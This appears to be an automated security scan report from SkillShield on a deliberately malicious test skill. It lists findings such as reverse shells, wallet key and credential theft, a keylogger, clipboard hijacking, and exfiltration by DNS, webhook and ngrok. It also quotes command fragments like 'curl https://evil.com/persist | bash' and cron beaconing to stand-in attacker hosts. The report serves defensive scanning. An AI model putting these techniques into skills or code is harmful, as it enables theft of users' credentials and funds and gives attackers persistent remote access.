Trust Assessment
malicious-skill received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 34 findings: 31 critical, 2 high, 1 medium, and 0 low severity. Key findings include Persistence / self-modification instructions, Arbitrary command execution, Missing required field: name.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Manifest Analysis layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings34
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Persistence / self-modification instructions Crontab manipulation (list/remove/edit) Remove any persistence mechanisms. Skills should not modify system startup configurations, crontabs, LaunchAgents, systemd services, or shell profiles. | Manifest | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/index.js:153 | |
| CRITICAL | Persistence / self-modification instructions Shell RC file modification for persistence Remove any persistence mechanisms. Skills should not modify system startup configurations, crontabs, LaunchAgents, systemd services, or shell profiles. | Manifest | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/index.js:150 | |
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/index.js:36 | |
| CRITICAL | Arbitrary command execution Python dynamic code execution (exec/eval/compile) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/index.js:30 | |
| CRITICAL | Arbitrary command execution Python dynamic code execution (exec/eval/compile) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/index.js:33 | |
| CRITICAL | Arbitrary command execution Python dynamic code execution (exec/eval/compile) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/index.js:65 | |
| CRITICAL | Arbitrary command execution Python dynamic code execution (exec/eval/compile) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/index.js:143 | |
| CRITICAL | Arbitrary command execution Python dynamic code execution (exec/eval/compile) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/index.js:144 | |
| CRITICAL | Arbitrary command execution Python dynamic code execution (exec/eval/compile) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/index.js:153 | |
| CRITICAL | Arbitrary command execution Node.js child_process require Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/index.js:8 | |
| CRITICAL | Arbitrary command execution Remote code download piped to interpreter Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/index.js:141 | |
| CRITICAL | Arbitrary command execution Remote code download piped to interpreter Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/index.js:150 | |
| CRITICAL | Command Injection via Reverse Shells The skill attempts to establish multiple reverse shells using `exec` with bash, netcat, and python. This allows an attacker to gain full remote control over the system where the skill is executed. Remove all calls to `child_process.exec` or `spawn` that execute arbitrary or untrusted commands. Implement strict allow-listing for commands and arguments if shell execution is absolutely necessary. | LLM | index.js:26 | |
| CRITICAL | Command Injection via Reverse Shells The skill attempts to establish multiple reverse shells using `exec` with bash, netcat, and python. This allows an attacker to gain full remote control over the system where the skill is executed. Remove all calls to `child_process.exec` or `spawn` that execute arbitrary or untrusted commands. Implement strict allow-listing for commands and arguments if shell execution is absolutely necessary. | LLM | index.js:29 | |
| CRITICAL | Command Injection via Reverse Shells The skill attempts to establish multiple reverse shells using `exec` with bash, netcat, and python. This allows an attacker to gain full remote control over the system where the skill is executed. Remove all calls to `child_process.exec` or `spawn` that execute arbitrary or untrusted commands. Implement strict allow-listing for commands and arguments if shell execution is absolutely necessary. | LLM | index.js:32 | |
| CRITICAL | Cryptocurrency Wallet Private Key Harvesting The `stealCrypto` function attempts to access and exfiltrate cryptocurrency wallet private keys from browser extension storage (`chrome.storage.local.get`) and `window.ethereum.selectedAddress`. This is a direct attempt to steal user funds. Remove any code that attempts to access or transmit sensitive cryptocurrency wallet information, including private keys or seed phrases. | LLM | index.js:12 | |
| CRITICAL | Data Exfiltration of Cryptocurrency Private Keys The `stealCrypto` function exfiltrates harvested cryptocurrency private keys and addresses to an external malicious server (`https://evil-wallet-stealer.com/collect`). Remove all network requests to untrusted external domains, especially those transmitting sensitive user data. Ensure all data handling complies with privacy policies. | LLM | index.js:19 | |
| CRITICAL | Credential Harvesting from Files and Environment Variables The `harvestCredentials` function reads sensitive configuration files (`~/.openclaw/openclaw.json`) and extracts API keys, secret tokens, and passwords from environment variables (`process.env`). This data is then prepared for exfiltration. Remove any code that accesses sensitive files or environment variables that are not explicitly required for the skill's legitimate functionality. Implement strict access controls. | LLM | index.js:39 | |
| CRITICAL | Credential Harvesting from Files and Environment Variables The `harvestCredentials` function reads sensitive configuration files (`~/.openclaw/openclaw.json`) and extracts API keys, secret tokens, and passwords from environment variables (`process.env`). This data is then prepared for exfiltration. Remove any code that accesses sensitive files or environment variables that are not explicitly required for the skill's legitimate functionality. Implement strict access controls. | LLM | index.js:43 | |
| CRITICAL | Hidden Instructions and Arbitrary Code Execution (eval/Function) The `deployPayload` function uses Base64 encoding to hide malicious JavaScript code (`fetch("https://evil.com/steal");` and `console.log("pwned")`) and then executes it using `eval(atob(encoded))` and `new Function(payload)`. This allows for arbitrary code execution. Remove all uses of `eval()`, `new Function()`, or similar dynamic code execution mechanisms, especially with untrusted or obfuscated input. Avoid Base64 encoding for code unless strictly necessary and properly validated. | LLM | index.js:56 | |
| CRITICAL | Hidden Instructions and Arbitrary Code Execution (eval/Function) The `deployPayload` function uses Base64 encoding to hide malicious JavaScript code (`fetch("https://evil.com/steal");` and `console.log("pwned")`) and then executes it using `eval(atob(encoded))` and `new Function(payload)`. This allows for arbitrary code execution. Remove all uses of `eval()`, `new Function()`, or similar dynamic code execution mechanisms, especially with untrusted or obfuscated input. Avoid Base64 encoding for code unless strictly necessary and properly validated. | LLM | index.js:60 | |
| CRITICAL | Keylogger Implementation The `Keylogger` class implements a keylogger by attaching event listeners to `keydown` and `input` events, specifically targeting password fields. This captures sensitive user input. Remove any code that monitors or captures user keystrokes or input field values. Such functionality is highly intrusive and a severe privacy risk. | LLM | index.js:70 | |
| CRITICAL | Data Exfiltration of Keystrokes The `Keylogger` class exfiltrates captured keystrokes and input data to an external malicious server (`https://evil-keylogger.com/logs`). Remove all network requests to untrusted external domains, especially those transmitting sensitive user data. Ensure all data handling complies with privacy policies. | LLM | index.js:89 | |
| CRITICAL | Clipboard Hijacking for Address Replacement The `paymentScam` function hijacks the clipboard (`document.addEventListener('copy')`) to replace legitimate cryptocurrency addresses with a scammer's address (`0xScammerAddress`) when the user copies an address. This can lead to loss of funds. Remove any code that interferes with or modifies the user's clipboard content, especially for sensitive data like cryptocurrency addresses. | LLM | index.js:100 | |
| CRITICAL | Data Exfiltration via DNS, Webhook, and Ngrok The `exfiltrate` function demonstrates multiple methods of data exfiltration: via DNS queries (`dnslog.cn`), Discord webhooks, and an ngrok tunnel. This allows sensitive data to be sent to various external malicious endpoints. Remove all network requests to untrusted external domains, especially those transmitting sensitive user data. Ensure all data handling complies with privacy policies. | LLM | index.js:112 | |
| CRITICAL | Data Exfiltration via DNS, Webhook, and Ngrok The `exfiltrate` function demonstrates multiple methods of data exfiltration: via DNS queries (`dnslog.cn`), Discord webhooks, and an ngrok tunnel. This allows sensitive data to be sent to various external malicious endpoints. Remove all network requests to untrusted external domains, especially those transmitting sensitive user data. Ensure all data handling complies with privacy policies. | LLM | index.js:115 | |
| CRITICAL | Data Exfiltration via DNS, Webhook, and Ngrok The `exfiltrate` function demonstrates multiple methods of data exfiltration: via DNS queries (`dnslog.cn`), Discord webhooks, and an ngrok tunnel. This allows sensitive data to be sent to various external malicious endpoints. Remove all network requests to untrusted external domains, especially those transmitting sensitive user data. Ensure all data handling complies with privacy policies. | LLM | index.js:121 | |
| CRITICAL | Command Injection via Remote Script Execution (curl | bash, wget | sh) The `installBackdoor` function uses `exec` to download and execute arbitrary scripts from remote URLs (`raw.githubusercontent.com`, `pastebin.com`) directly into the shell. This is a severe command injection vulnerability and supply chain risk. Never execute remote scripts directly. If external scripts are needed, they must be downloaded, thoroughly reviewed, and executed in a controlled, sandboxed environment. | LLM | index.js:128 | |
| CRITICAL | Command Injection via Remote Script Execution (curl | bash, wget | sh) The `installBackdoor` function uses `exec` to download and execute arbitrary scripts from remote URLs (`raw.githubusercontent.com`, `pastebin.com`) directly into the shell. This is a severe command injection vulnerability and supply chain risk. Never execute remote scripts directly. If external scripts are needed, they must be downloaded, thoroughly reviewed, and executed in a controlled, sandboxed environment. | LLM | index.js:129 | |
| CRITICAL | Persistence Mechanism via .bashrc Modification The `setupPersistence` function modifies the user's `.bashrc` file to include a command that downloads and executes a remote script (`curl https://evil.com/persist | bash`) upon shell startup. This establishes a persistent backdoor. Remove any code that modifies system configuration files or user startup scripts (`.bashrc`, `.zshrc`, etc.). Skills should not have write access to such sensitive locations. | LLM | index.js:134 | |
| CRITICAL | Persistence Mechanism via Cron Job Creation The `setupPersistence` function creates a cron job that periodically executes a command (`curl https://evil.com/beacon`). This establishes a persistent beaconing mechanism or backdoor. Remove any code that creates or modifies cron jobs. Skills should not have the ability to schedule system-level tasks. | LLM | index.js:137 | |
| HIGH | Social Engineering / Payment Scam via Alert The `paymentScam` function displays a fake error message (`alert`) attempting to trick the user into sending cryptocurrency to a scammer's address. This is a direct social engineering attack. Remove any code that attempts to deceive users or solicit funds through misleading messages or prompts. Ensure all user interactions are transparent and legitimate. | LLM | index.js:97 | |
| HIGH | Exposure of Malicious Functions via Module Exports The skill explicitly exports highly malicious functions (`stealCrypto`, `harvestCredentials`, `Keylogger`, `paymentScam`, `exfiltrate`) via `module.exports`. This makes these functions directly callable by other parts of the application or host environment, increasing the attack surface. Only export functions that are absolutely necessary for the skill's intended, legitimate functionality. Avoid exposing internal or sensitive helper functions. | LLM | index.js:149 | |
| MEDIUM | Missing required field: name The 'name' field is required for claude_code skills but is missing from frontmatter. Add a 'name' field to the SKILL.md frontmatter. | Static | skills/lvcidpsyche/skill-bomb-dog-sniff/test/malicious-skill/SKILL.md:1 |
Scan History
Embed Code
[](https://skillshield.io/report/9086fe3229edea32)
Powered by SkillShield